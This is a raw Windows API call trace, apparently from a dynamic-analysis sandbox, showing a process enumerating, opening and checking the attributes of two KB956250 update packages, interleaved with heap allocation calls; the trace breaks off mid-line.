[0082.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.128] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.128] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113, dwReserved0=0x1, dwReserved1=0x0, cFileName="Windows6.0-KB956250-v6001-x64.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0082.128] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.128] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0082.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0082.129] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0082.129] AreFileApisANSI () returned 1 [0082.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 56 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.129] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.129] AreFileApisANSI () returned 1 [0082.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.129] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0082.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 56 [0082.130] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.130] GetFileType (hFile=0x428) returned 0x1 [0082.130] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0082.130] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.130] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.130] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.130] CloseHandle (hObject=0x428) returned 1 [0082.131] AreFileApisANSI () returned 1 [0082.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0082.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 56 [0082.131] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.131] GetFileType (hFile=0x428) returned 0x1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0082.131] CloseHandle (hObject=0x428) returned 1 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0082.131] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0082.131] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0082.132] AreFileApisANSI () returned 1 [0082.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0082.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu") returned 56 [0082.132] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x64.msu"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x2120bc00, ftCreationTime.dwHighDateTime=0x1cac6c9, ftLastAccessTime.dwLowDateTime=0x2120bc00, ftLastAccessTime.dwHighDateTime=0x1cac6c9, ftLastWriteTime.dwLowDateTime=0x2120bc00, ftLastWriteTime.dwHighDateTime=0x1cac6c9, nFileSizeHigh=0x0, nFileSizeLow=0x4f5113)) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0082.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.132] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.132] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Windows6.0-KB956250-v6001-x86.msu", cAlternateFileName="WINDOW~2.MSU")) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0082.132] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0082.132] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0082.332] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0082.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0082.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0082.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0082.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0082.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0082.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0082.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0082.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0082.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0082.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0082.347] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0082.347] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0082.347] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0082.348] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0082.348] AreFileApisANSI () returned 1 [0082.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu", lpUsedDefaultChar=0x0) returned 56 [0082.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0082.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.348] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0082.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0082.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0082.348] AreFileApisANSI () returned 1 [0082.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.348] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0082.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75f30, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 56 [0082.348] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.349] GetFileType (hFile=0x428) returned 0x1 [0082.349] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0082.349] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0082.349] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0082.349] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0082.349] CloseHandle (hObject=0x428) returned 1 [0082.349] AreFileApisANSI () returned 1 [0082.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.349] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0082.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x76200, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 56 [0082.350] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0082.350] GetFileType (hFile=0x428) returned 0x1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0082.350] CloseHandle (hObject=0x428) returned 1 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0082.350] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0082.350] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0082.351] AreFileApisANSI () returned 1 [0082.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0082.351] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0082.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53838, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 56 [0082.351] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520)) returned 1 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0082.351] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0082.351] HeapFree (in: 